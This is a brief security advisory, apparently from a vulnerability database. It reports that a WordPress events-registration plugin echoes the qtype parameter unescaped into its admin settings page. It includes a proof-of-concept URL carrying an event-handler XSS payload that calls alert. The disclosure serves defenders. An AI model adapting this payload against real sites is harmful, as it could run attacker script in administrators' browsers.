The plugin does not escape the qtype parameter before outputting it back in an attribute in the settings page, leading to a Reflected Cross-Site Scripting
http://example.com/wp-admin/admin.php?page=registrations-for-the-events-calendar&qtype=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28/XSS/%29+p%3D